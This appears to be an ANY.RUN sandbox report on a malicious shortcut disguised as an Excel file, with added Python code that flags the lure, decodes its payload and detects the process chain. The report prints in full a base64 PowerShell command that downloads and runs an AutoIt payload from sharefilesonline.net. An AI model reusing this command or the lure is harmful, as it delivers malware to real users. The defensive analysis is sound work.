/Downloads/MixDep2025.xls.lnk

Full analysis: https://app.any.run/tasks/fa2288b4-3759-4f54-acb3-a0b31d2a5d4e
Verdict: Malicious activity
Analysis date: March 15, 2025, 23:43:55
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
autoit
susp-powershell
arch-exec
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Unicoded, Archive, ctime=Tue Dec 17 10:41:13 2024, atime=Wed Feb 26 17:06:33 2025, mtime=Tue Dec 17 10:41:13 2024, length=245760, window=showminnoactive, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe"
MD5:

27BC8CF12690AEC8DF78B3CF6E298B63

SHA1:

F3C1A714DEE2413A97F5FA0588A90B84A6A95E5C

SHA256:

65729A2AC815D385EAE0EC53CB58EDC12BC915AC81BF7AA40D48B06029F2E243

SSDEEP:

48:8s5JeDTsA2A3TlYPXqhMkClF66VUAv0BhQGuP:8sL59A3G/qh3Cn9R3R

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4560)
  • SUSPICIOUS

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 660)
    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 4560)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4560)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 660)
      • cmd.exe (PID: 8044)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4560)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 4560)
    • Starts the AutoIt3 executable file

      • powershell.exe (PID: 4560)
    • Reads security settings of Internet Explorer

      • a.exe (PID: 7904)
      • ShellExperienceHost.exe (PID: 8168)
    • Starts CMD.EXE for commands execution

      • a.exe (PID: 7904)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 8092)
    • Potential Corporate Privacy Violation

      • a.exe (PID: 7904)
    • Sets XML DOM element text (SCRIPT)

      • splwow64.exe (PID: 7932)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 4560)
    • Checks proxy server information

      • powershell.exe (PID: 4560)
      • a.exe (PID: 7904)
      • BackgroundTransferHost.exe (PID: 7872)
      • slui.exe (PID: 7232)
    • The executable file from the user directory is run by the Powershell process

      • a.exe (PID: 7904)
    • Reads mouse settings

      • a.exe (PID: 7904)
    • Checks supported languages

      • a.exe (PID: 7904)
      • ShellExperienceHost.exe (PID: 8168)
    • Reads the computer name

      • a.exe (PID: 7904)
      • ShellExperienceHost.exe (PID: 8168)
    • The sample compiled with english language support

      • powershell.exe (PID: 4560)
    • Reads the machine GUID from the registry

      • a.exe (PID: 7904)
    • Found Base64 encoded network access via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • powershell.exe (PID: 4560)
    • Creates files in the program directory

      • a.exe (PID: 7904)
    • Found Base64 encoded access to environment variables via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • conhost.exe (PID: 780)
      • powershell.exe (PID: 4560)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • powershell.exe (PID: 4560)
    • Reads the software policy settings

      • a.exe (PID: 7904)
      • BackgroundTransferHost.exe (PID: 7872)
      • slui.exe (PID: 7396)
      • slui.exe (PID: 7232)
    • Found Base64 encoded file access via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • powershell.exe (PID: 4560)
      • conhost.exe (PID: 780)
    • Creates files or folders in the user directory

      • a.exe (PID: 7904)
      • BackgroundTransferHost.exe (PID: 7872)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 8092)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8092)
    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 3140)
      • BackgroundTransferHost.exe (PID: 7872)
      • BackgroundTransferHost.exe (PID: 8064)
      • BackgroundTransferHost.exe (PID: 8052)
      • BackgroundTransferHost.exe (PID: 536)
      • splwow64.exe (PID: 7932)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 8092)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode
FileAttributes: Archive
CreateDate: 2024:12:17 10:41:13+00:00
AccessDate: 2025:02:26 17:06:33+00:00
ModifyDate: 2024:12:17 10:41:13+00:00
TargetFileSize: 245760
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
DriveSerialNumber: D408-2CA4
VolumeLabel: -
LocalBasePath: C:\Windows\System32\cmd.exe
Description: Document Shortcut
RelativePath: ..\..\..\..\..\..\..\..\Windows\System32\cmd.exe
WorkingDirectory: C:\Users\Work\Desktop
CommandLineArguments: /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('…')) | Invoke-Expression" (the base64 argument is elided in this export; the same blob appears in full in the command line of powershell.exe, PID 4560, under Process information)
IconFileName: .\Document.xls
MachineID: desktop-8cluclv
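The shortcut's command line is the whole first stage: cmd.exe launches a hidden PowerShell that base64-decodes a blob and pipes it to Invoke-Expression. The Python below is an added example, not part of the ANY.RUN report. It reproduces the LNK fields above as a hand-built dict (the base64 blob is the one shown in full for PID 4560 under Process information), flags the lure characteristics a triage script should catch, and decodes the embedded script to pull out the URLs and file paths. The function names `lnk_red_flags`, `decode_embedded_script` and `extract_iocs` are chosen here; nothing is downloaded.

```python
"""Static triage of a .lnk whose real target is cmd.exe (added example)."""
import base64
import re

# Base64 argument carried in the shortcut's CommandLineArguments, copied from
# the report's entry for powershell.exe (PID 4560). Decoding only; never run it.
ENCODED_COMMAND = (
    "JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRz"
    "PVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50"
    "cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29u"
    "bGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xN"
    "aXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1l"
    "bnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0"
    "cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRl"
    "bXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29t"
    "cHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZp"
    "bGVdOjpleHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7"
    "U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRM"
    "aXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K"
)

# Shortcut fields as an LNK parser (e.g. exiftool) reports them. Hand-built from
# the values in the report; this example does not parse the binary itself.
LNK_META = {
    "Description": "Document Shortcut",
    "IconFileName": r".\Document.xls",
    "LocalBasePath": r"C:\Windows\System32\cmd.exe",
    "RelativePath": r"..\..\..\..\..\..\..\..\Windows\System32\cmd.exe",
    "WorkingDirectory": r"C:\Users\Work\Desktop",
    "RunWindow": "Show Minimized No Activate",
    "CommandLineArguments": (
        '/c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString('
        "[System.Convert]::FromBase64String('" + ENCODED_COMMAND + "')) | Invoke-Expression\""
    ),
}

SHELL_TARGETS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe")
DOC_ICON_EXTS = (".xls", ".xlsx", ".doc", ".docx", ".pdf")


def lnk_red_flags(meta: dict, filename: str) -> list[str]:
    """Return the reasons a shortcut looks like a document lure (empty list if none)."""
    flags = []
    target = meta.get("LocalBasePath", "").lower()
    args = meta.get("CommandLineArguments", "")
    icon = meta.get("IconFileName", "").lower()
    base = filename.lower()
    if target.endswith(SHELL_TARGETS):
        flags.append(f"target is an interpreter: {meta['LocalBasePath']}")
    if icon.endswith(DOC_ICON_EXTS) and target.endswith(SHELL_TARGETS):
        flags.append(f"document icon ({meta['IconFileName']}) masks a shell target")
    if base.endswith(".lnk") and base[:-4].endswith(DOC_ICON_EXTS):
        flags.append(f"double extension in file name: {filename}")
    if meta.get("RelativePath", "").count("..\\") >= 4:
        flags.append("relative path climbs far up the tree to reach the target")
    if "minimized" in meta.get("RunWindow", "").lower():
        flags.append("window is set to start minimized")
    if re.search(r"-w(?:indowstyle)?\s+hidden", args, re.I):
        flags.append("PowerShell launched with a hidden window")
    if re.search(r"FromBase64String", args, re.I) and re.search(r"\bIEX\b|Invoke-Expression", args, re.I):
        flags.append("base64-encoded script piped to Invoke-Expression")
    return flags


B64_IN_POWERSHELL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.I)


def decode_embedded_script(args: str) -> str:
    """Extract and decode the literal handed to FromBase64String.

    The lure decodes with UTF8.GetString, so UTF-8 is correct here; a payload
    passed via -EncodedCommand would be UTF-16LE instead.
    """
    m = B64_IN_POWERSHELL.search(args)
    if not m:
        raise ValueError("no FromBase64String('...') literal found")
    return base64.b64decode(m.group(1)).decode("utf-8")


URL_RE = re.compile(r"https?://[^\s'\"]+")
PATH_ARG_RE = re.compile(r"-(?:OutFile|FilePath|ArgumentList)\s+\"([^\"]+)\"")


def extract_iocs(script: str) -> dict:
    """Network and file-system indicators from the decoded PowerShell."""
    return {
        "urls": URL_RE.findall(script),
        "paths": PATH_ARG_RE.findall(script),
        "launches": re.findall(r"Start-Process\s+-FilePath\s+\"([^\"]+)\"", script),
    }


if __name__ == "__main__":
    for flag in lnk_red_flags(LNK_META, "MixDep2025.xls.lnk"):
        print("flag:", flag)
    decoded = decode_embedded_script(LNK_META["CommandLineArguments"])
    print(decoded)
    print(extract_iocs(decoded))
```

Decoding yields exactly what the sandbox then observed: two downloads from sharefilesonline.net (a decoy MixDep2025.xlsx written to Documents and opened with Start-Process, then erw.zip unpacked into %TEMP%), followed by `$temp\a.exe` started with `$temp\P.a3x` as its argument, i.e. the AutoIt3 interpreter running a compiled (.a3x) script, which matches the "Starts the AutoIt3 executable file" signature and the autoit tag above.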
No data.
All screenshots are available in the full report
Total processes
160
Monitored processes
20
Malicious processes
2
Suspicious processes
1

Behavior graph

Processes in the graph, as listed (the "no specs" marker is ANY.RUN's own):
  • start
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • powershell.exe
  • sppextcomobj.exe (no specs)
  • slui.exe
  • excel.exe
  • a.exe
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • powershell.exe (no specs)
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • backgroundtransferhost.exe (no specs)
  • backgroundtransferhost.exe
  • backgroundtransferhost.exe (no specs)
  • backgroundtransferhost.exe (no specs)
  • backgroundtransferhost.exe (no specs)
  • slui.exe
  • splwow64.exe (no specs)
  • shellexperiencehost.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID:
536
CMD:
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path:
C:\Windows\System32\BackgroundTransferHost.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID:
660
CMD:
"C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('…')) | Invoke-Expression" (base64 argument elided in this export; it is the blob shown in full for PID 4560 below)
Path:
C:\Windows\System32\cmd.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
PID:
780
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1164
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
2108
CMD:
C:\WINDOWS\system32\cmd.exe /c python.exe logo.png
Path:
C:\Windows\SysWOW64\cmd.exe
Parent process:
a.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID:
3140
CMD:
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path:
C:\Windows\System32\BackgroundTransferHost.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID:
4560
CMD:
powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression"
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
7232
CMD:
C:\WINDOWS\System32\slui.exe -Embedding
Path:
C:\Windows\System32\slui.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID:
7352
CMD:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path:
C:\Windows\System32\SppExtComObj.Exe
Parent process:
svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
PID:
7396
CMD:
"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path:
C:\Windows\System32\slui.exe
Parent process:
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
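The process entries above give the chain explorer.exe > cmd.exe (PID 660) > powershell.exe (PID 4560) > a.exe (PID 7904) > cmd.exe (PID 2108, `/c python.exe logo.png`, exit code 1). As an added example that is not part of the report, the Python below runs a small set of process-creation rules over a constructed set of events shaped like that chain (Sysmon Event ID 1 style fields) and reconstructs the ancestry of any hit. The ppid for explorer.exe, the benign PowerShell control entry, and the a.exe command line (taken from the Start-Process call in the decoded script rather than from a process record on this page) are assumptions; the base64 blob is truncated because the rules key on the FromBase64String call, not on its content.

```python
"""Process-creation detection for the explorer > cmd > powershell > a.exe > cmd chain (added example)."""
import re
from pathlib import PureWindowsPath

# First characters of the base64 blob from the report; the rest is cut because
# the rules below key on the FromBase64String call, not on the blob itself.
B64 = "JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTsk"
PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
TEMP = "C:\\Users\\admin\\AppData\\Local\\Temp\\"

# Constructed events. pids/images/command lines for 660, 4560 and 2108 follow
# the report; ppid 1234 (explorer.exe), the a.exe command line and pid 9001 are assumed.
EVENTS = [
    {"pid": 660, "ppid": 1234, "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": '"C:\\Windows\\System32\\cmd.exe" /c powershell -WindowStyle Hidden -Command '
                '"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\''
                + B64 + '\')) | Invoke-Expression"'},
    {"pid": 4560, "ppid": 660, "image": PS_EXE, "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": 'powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString('
                '[System.Convert]::FromBase64String(\'' + B64 + '\')) | Invoke-Expression"'},
    # a.exe + P.a3x as the decoded script's Start-Process call would launch it (assumption).
    {"pid": 7904, "ppid": 4560, "image": TEMP + "a.exe", "parent_image": PS_EXE,
     "cmdline": '"' + TEMP + 'a.exe" ' + TEMP + "P.a3x"},
    {"pid": 2108, "ppid": 7904, "image": "C:\\Windows\\SysWOW64\\cmd.exe", "parent_image": TEMP + "a.exe",
     "cmdline": "C:\\WINDOWS\\system32\\cmd.exe /c python.exe logo.png"},
    # Benign control: an interactive PowerShell session (constructed, not from the report).
    {"pid": 9001, "ppid": 1234, "image": PS_EXE, "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": 'powershell -NoProfile -Command "Get-Process | Sort-Object CPU"'},
]

USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\programdata\\",
                 "\\users\\public\\", "\\downloads\\")
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def rule_hidden_encoded_powershell(ev: dict) -> bool:
    """PowerShell with a hidden window, a base64 payload and IEX/Invoke-Expression."""
    if basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    c = ev["cmdline"]
    hidden = re.search(r"-w(?:indowstyle)?\s+hidden", c, re.I)
    encoded = re.search(r"FromBase64String|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", c, re.I)
    iex = re.search(r"\bIEX\b|Invoke-Expression", c, re.I)
    return bool(hidden and encoded and iex)


def rule_explorer_cmd_powershell(ev: dict) -> bool:
    """cmd.exe started by explorer.exe that hands straight off to PowerShell: the
    shape a .lnk targeting 'cmd.exe /c powershell ...' produces. A user typing the
    same thing into Run looks identical, so treat this as a weak signal on its own."""
    return (basename(ev["image"]) == "cmd.exe"
            and basename(ev["parent_image"]) == "explorer.exe"
            and re.search(r"/c\s+powershell", ev["cmdline"], re.I) is not None)


def rule_autoit_script_from_user_dir(ev: dict) -> bool:
    """Executable in a user-writable directory, launched by PowerShell, given a
    compiled AutoIt script (.a3x) as argument: the a.exe + P.a3x pairing."""
    return (in_user_writable(ev["image"])
            and basename(ev["parent_image"]) in {"powershell.exe", "pwsh.exe"}
            and re.search(r"\.a3x\b", ev["cmdline"], re.I) is not None)


def rule_interpreter_from_dropped_exe(ev: dict) -> bool:
    """An interpreter whose parent binary lives in a user-writable directory."""
    return basename(ev["image"]) in INTERPRETERS and in_user_writable(ev["parent_image"])


RULES = {
    "hidden_encoded_powershell": rule_hidden_encoded_powershell,
    "explorer_cmd_to_powershell": rule_explorer_cmd_powershell,
    "autoit_script_from_user_dir": rule_autoit_script_from_user_dir,
    "interpreter_from_dropped_exe": rule_interpreter_from_dropped_exe,
}


def detect(events: list) -> list:
    """Return [(pid, rule_name), ...] for every event/rule match."""
    return [(ev["pid"], name) for ev in events for name, rule in RULES.items() if rule(ev)]


def ancestry(events: list, pid: int) -> list:
    """Image basenames from the root ancestor down to pid, following ppid links;
    a parent absent from the event set is named from its child's parent_image."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(basename(ev["image"]))
        if ev["ppid"] not in by_pid:
            chain.append(basename(ev["parent_image"]))
        pid = ev["ppid"]
    return chain[::-1]


if __name__ == "__main__":
    for pid, name in detect(EVENTS):
        print(pid, name, " > ".join(ancestry(EVENTS, pid)))
```

Each malicious record trips exactly one rule while the interactive PowerShell control trips none; the ancestry for PID 2108 comes back as explorer.exe > cmd.exe > powershell.exe > a.exe > cmd.exe, which is the chain the report's process entries describe. In production the weak explorer-to-cmd-to-powershell rule is best used to enrich the stronger hits rather than to alert on its own.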
Total events
22 078
Read events
21 792
Write events
258
Delete events
28

Modification events

Process: powershell.exe (PID 4560)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
Operation: write
Name: Excel.Sheet.12
Value: (empty)

Process: powershell.exe (PID 4560)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation: write
Name: {33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value: 01000000000000006781EC240496DB01

Process: EXCEL.EXE (PID 7404)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7404
Operation: write
Name: 0
Value: 0B0E10C1B0724EFD8BD1408DA30125C337E10A230046B8B4F3E5C2C0E5ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511EC39D2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300

Process: EXCEL.EXE (PID 7404)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation: write
Name: ImmersiveWorkbookDirtySentinel
Value: 0

Process: EXCEL.EXE (PID 7404)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation: write
Name: ExcelPreviousSessionId
Value: {4E72B0C1-8BFD-40D1-8DA3-0125C337E10A}

Process: EXCEL.EXE (PID 7404)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common
Operation: write
Name: SessionId
Value: 07D870B5DA07B04A93253D1C3561FE2C

Process: EXCEL.EXE (PID 7404)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\EXCEL\5396
Operation: delete value
Name: 0
Value: (binary data; rendered as garbage characters in the export, not reproduced)

Process: EXCEL.EXE (PID 7404)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\EXCEL\5396
Operation: delete key
Name: (default)
Value: (empty)

Process: EXCEL.EXE (PID 7404)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7404
Operation: write
Name: 0
Value: 0B0E10C1B0724EFD8BD1408DA30125C337E10A230046B8B4F3E5C2C0E5ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C50E8908C91003783634C511EC39D2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300

Process: EXCEL.EXE (PID 7404)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation: write
Name: 1
Value: 01D014000000001000B24E9A3E02000000000000000600000000000000
Executable files
2
Suspicious files
32
Text files
9
Unknown types
0

Dropped files

PID Process | Filename | Type

4560 powershell.exe | C:\Users\admin\AppData\Local\Temp\erw.zip | compressed
MD5: B3C2C56FF4E267B3035FDAA99DBB6D1B
SHA256: C010AF5721DD82689CCBC529C180006F616761631E2A14B953535897BD778356

